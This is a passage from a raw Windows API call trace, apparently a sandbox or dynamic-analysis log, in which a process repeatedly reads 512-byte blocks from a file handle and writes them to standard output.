lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.065] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.065] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.066] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.066] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.067] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.067] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.068] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.068] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.069] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.069] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.070] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.070] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.071] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.071] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, 